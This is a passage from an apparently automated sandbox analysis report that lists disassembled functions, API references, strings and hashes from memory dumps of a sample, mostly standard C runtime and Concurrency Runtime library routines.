                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF22C
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF23E
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF250
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF262
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF274
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF286
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF298
                    • _free.LIBCMT ref: 021BF5FF
                      • Part of subcall function 021BB05C: HeapFree.KERNEL32(00000000,00000000,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?), ref: 021BB072
                      • Part of subcall function 021BB05C: GetLastError.KERNEL32(?,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?,?), ref: 021BB084
                    • _free.LIBCMT ref: 021BF621
                    • _free.LIBCMT ref: 021BF636
                    • _free.LIBCMT ref: 021BF641
                    • _free.LIBCMT ref: 021BF663
                    • _free.LIBCMT ref: 021BF676
                    • _free.LIBCMT ref: 021BF684
                    • _free.LIBCMT ref: 021BF68F
                    • _free.LIBCMT ref: 021BF6C7
                    • _free.LIBCMT ref: 021BF6CE
                    • _free.LIBCMT ref: 021BF6EB
                    • _free.LIBCMT ref: 021BF703
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                    • Instruction ID: c76555661263263d5ef0f4eada66840645e59e3a721c701c149f93f5d31384b0
                    • Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                    • Instruction Fuzzy Hash: E7315D316842019FDB32AA38DC84BEA77FABF00358F104419F868D6DA0DB71A982CB50
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0219F296
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0219F522
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog3std::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1590901807-0
                    • Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
                    • Instruction ID: 358d5c7b561bde5b7a8fd1d12c6ce5d3a4f3698fa40ccc4dd9e0cfd1e56ad913
                    • Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
                    • Instruction Fuzzy Hash: 7981AF31D80218AFDF25DFA8C884BEEB7B5BF05314F244119D815E7681DB38AA46CF91
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00465750,00000FA0,?,?,0041D007), ref: 0041D035
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D007), ref: 0041D040
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D007), ref: 0041D051
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D063
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D071
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D007), ref: 0041D094
                    • ___scrt_fastfail.LIBCMT ref: 0041D0A5
                    • RtlDeleteCriticalSection.NTDLL(00465750), ref: 0041D0B0
                    • CloseHandle.KERNEL32(00000000,?,?,0041D007), ref: 0041D0C0
                    Strings
                    • SleepConditionVariableCS, xrefs: 0041D05D
                    • WakeAllConditionVariable, xrefs: 0041D069
                    • kernel32.dll, xrefs: 0041D04C
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D03B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 3578986977-3242537097
                    • Opcode ID: 5773b3b592dab99726245edcd6fa20dcc163fa756fd668b0a9920edcf870acc0
                    • Instruction ID: da8957fb05adf3e2478d3987b837cced664d2ae1275a3d1fb98c7f3dc6632c06
                    • Opcode Fuzzy Hash: 5773b3b592dab99726245edcd6fa20dcc163fa756fd668b0a9920edcf870acc0
                    • Instruction Fuzzy Hash: 1501B575E40B11ABDB211B75AC08F9B3A98DB45B57F140132FC05D22A1EAB9CC41CA6E
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004326E3
                      • Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432704
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432711
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043275F
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004327E6
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004327F9
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432846
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                    • Instruction ID: fb03d83531a47042b93fe6564ff1c061b34d3f88821af197b1cf19dfef14ec32
                    • Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                    • Instruction Fuzzy Hash: 6B81C270900249ABDF169F54CA41BBF7BB1AF0D308F04509AEC4127352C7BA8D16DB65
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 021B294A
                      • Part of subcall function 021B2748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021B276B
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 021B296B
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 021B2978
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 021B29C6
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 021B2A4D
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 021B2A60
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 021B2AAD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                    • Instruction ID: 3c0a4f654e4f8a024cbf19b41666c1cd698ecd85552a4d6809c8f60623fe8efa
                    • Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                    • Instruction Fuzzy Hash: 3281B234940249AFDF27DFA4CA50BFE7B72AF4A348F040098EC516B251C776895EDB62
                    APIs
                    • __EH_prolog3.LIBCMT ref: 021A474C
                    • ListArray.LIBCONCRT ref: 021A479F
                      • Part of subcall function 021A4580: RtlInitializeSListHead.NTDLL(?), ref: 021A464C
                      • Part of subcall function 021A4580: RtlInitializeSListHead.NTDLL(?), ref: 021A4656
                    • ListArray.LIBCONCRT ref: 021A47D3
                    • Hash.LIBCMT ref: 021A483C
                    • Hash.LIBCMT ref: 021A484C
                    • RtlInitializeSListHead.NTDLL(?), ref: 021A48E1
                    • RtlInitializeSListHead.NTDLL(?), ref: 021A48EE
                    • RtlInitializeSListHead.NTDLL(?), ref: 021A48FB
                    • RtlInitializeSListHead.NTDLL(?), ref: 021A4908
                      • Part of subcall function 021A9EA8: std::bad_exception::bad_exception.LIBCMT ref: 021A9ECA
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 021A4990
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 021A49B2
                    • GetLastError.KERNEL32(021A56F2,?,?,00000000,?,?), ref: 021A49C4
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 021A49E1
                      • Part of subcall function 0219FE11: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,021A56F2,00000008,?,021A49E6,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0219FE29
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A4A0B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID:
                    • API String ID: 1224710184-0
                    • Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
                    • Instruction ID: 1597d3108b691a2d57c435a9794f50a68db4dae275f5dfcc21cdfd2ebfc7d253
                    • Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
                    • Instruction Fuzzy Hash: D5815AB4A51B62BFD708DF74C854BD9FBA9BF09710F10421AE42897280DBB5A264CFD1
                    APIs
                    • ListArray.LIBCONCRT ref: 00424538
                      • Part of subcall function 00424319: RtlInitializeSListHead.NTDLL(?), ref: 004243E5
                      • Part of subcall function 00424319: RtlInitializeSListHead.NTDLL(?), ref: 004243EF
                    • ListArray.LIBCONCRT ref: 0042456C
                    • Hash.LIBCMT ref: 004245D5
                    • Hash.LIBCMT ref: 004245E5
                    • RtlInitializeSListHead.NTDLL(?), ref: 0042467A
                    • RtlInitializeSListHead.NTDLL(?), ref: 00424687
                    • RtlInitializeSListHead.NTDLL(?), ref: 00424694
                    • RtlInitializeSListHead.NTDLL(?), ref: 004246A1
                      • Part of subcall function 00429C41: std::bad_exception::bad_exception.LIBCMT ref: 00429C63
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 00424729
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042474B
                    • GetLastError.KERNEL32(0042548B,?,?,00000000,?,?), ref: 0042475D
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042477A
                      • Part of subcall function 0041FBAA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042548B,00000008,?,0042477F,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FBC2
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004247A4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
                    • String ID:
                    • API String ID: 2750799244-0
                    • Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
                    • Instruction ID: 8edcf0d5cb27459604d76cf7b2957bb715be8d06604c13dd231c773c6d0fd610
                    • Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
                    • Instruction Fuzzy Hash: 37816EB0B10B22AAD708DF75D845BD9FBA8BF49704F50021FF42897281CBB8A564CBD5
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422841
                      • Part of subcall function 00423B2C: GetVersionExW.KERNEL32(?), ref: 00423B50
                      • Part of subcall function 00423B2C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423BEF
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422855
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422876
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228DF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422913
                      • Part of subcall function 004207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042080D
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422993
                      • Part of subcall function 0042235C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422370
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229DB
                      • Part of subcall function 004207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004207DE
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229EF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422A00
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422A4D
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422A72
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                    • Instruction ID: e80cf76bb90d4b83ff5cf9a0939ff877604985d568bc9a9fcea241cccaa3ebda
                    • Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                    • Instruction Fuzzy Hash: 0481BF71B00526ABCB18DF69FA9057EB7F1BB48704B94403ED441A3741EBB8A981CB9D
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 021A2AA8
                      • Part of subcall function 021A3D93: GetVersionExW.KERNEL32(?), ref: 021A3DB7
                      • Part of subcall function 021A3D93: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 021A3E56
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 021A2ABC
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 021A2ADD
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 021A2B46
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 021A2B7A
                      • Part of subcall function 021A0A54: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 021A0A74
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 021A2BFA
                      • Part of subcall function 021A25C3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 021A25D7
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 021A2C42
                      • Part of subcall function 021A0A29: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 021A0A45
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 021A2C56
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 021A2C67
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 021A2CB4
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 021A2CD9
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 021A2CE5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                    • Instruction ID: aaf0472250220cf9ddfe9408ebfabcb2fbfa269678f475d45066051b3ae87f82
                    • Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                    • Instruction Fuzzy Hash: CB81C479A8151A9FCB28DFA8D8B06BDB7F2BB48704F24403DD842E7344E771A944CB95
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423BE6), ref: 0041FA7F
                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FA8D
                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FA9B
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FAC9
                    • GetLastError.KERNEL32(?,?,?,00423BE6), ref: 0041FAE4
                    • GetLastError.KERNEL32(?,?,?,00423BE6), ref: 0041FAF0
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FB06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                    • API String ID: 1654681794-465693683
                    • Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
                    • Instruction ID: d2013d26350a1230dd44c523f95b164804869e8c7fe68790ab887d0678fdf32d
                    • Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
                    • Instruction Fuzzy Hash: 800165396003116F97107BB5BC4ABAB7AACAD04756724053BF805D2293EAACD449866D
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004353A0
                    • type_info::operator==.LIBVCRUNTIME ref: 004353C7
                    • ___TypeMatch.LIBVCRUNTIME ref: 004354D3
                    • CatchIt.LIBVCRUNTIME ref: 00435528
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004355AE
                    • _UnwindNestedFrames.LIBCMT ref: 00435635
                    • CallUnexpected.LIBVCRUNTIME ref: 00435650
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
                    • Instruction ID: 7946f23dea792be26d4820a62e4550dff79cbb7357508b3bf55c7f92dc133849
                    • Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
                    • Instruction Fuzzy Hash: C3C1AA71800609EFCF19DF95C881AAEBBB5BF1C315F04615BE8156B206C338EA51CF99
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 021B5607
                    • type_info::operator==.LIBVCRUNTIME ref: 021B562E
                    • ___TypeMatch.LIBVCRUNTIME ref: 021B573A
                    • CatchIt.LIBVCRUNTIME ref: 021B578F
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 021B5815
                    • _UnwindNestedFrames.LIBCMT ref: 021B589C
                    • CallUnexpected.LIBVCRUNTIME ref: 021B58B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
                    • Instruction ID: 9ae639b5154172238d9096a818c1d8b770631a4f7e5c00f4d93bc8ca62793c38
                    • Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
                    • Instruction Fuzzy Hash: 04C15971980209EFCF2ADFA5D880AEEBBBBBF04314F94456AE8156B201D731D951CF91
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432982
                      • Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004329A3
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004329B0
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004329FE
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432AA6
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432AD8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                    • Instruction ID: 2c3f4ac1ddb9b2e884700b4006eb7aadb935b7841f65a9e333380771e6a1d96e
                    • Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                    • Instruction Fuzzy Hash: 8271BC70A00249AFDF15DF54CA80BBFBBB1AF49308F04509AEC416B352C7B9AD16DB65
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 021B2BE9
                      • Part of subcall function 021B2748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021B276B
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 021B2C0A
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 021B2C17
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 021B2C65
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 021B2D0D
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 021B2D3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                    • Instruction ID: 3dc88ab22f3041de0146d481fb469319e009f13abf8a7edabb33531eb5dc731a
                    • Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                    • Instruction Fuzzy Hash: 2971DC74940249AFDF17DF68C990BFEBBB6AF49304F044099EC11AB291C732D91ADB61
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 021AECE0
                      • Part of subcall function 021A9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021A91B7
                    • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 021AECF9
                    • Concurrency::location::_Assign.LIBCMT ref: 021AED0F
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 021AED7C
                    • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 021AED84
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021AEDAB
                    • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 021AEDB7
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 021AEDEF
                    • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 021AEE0E
                    • Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 021AEE1C
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 021AEE43
                    Memory Dump Source
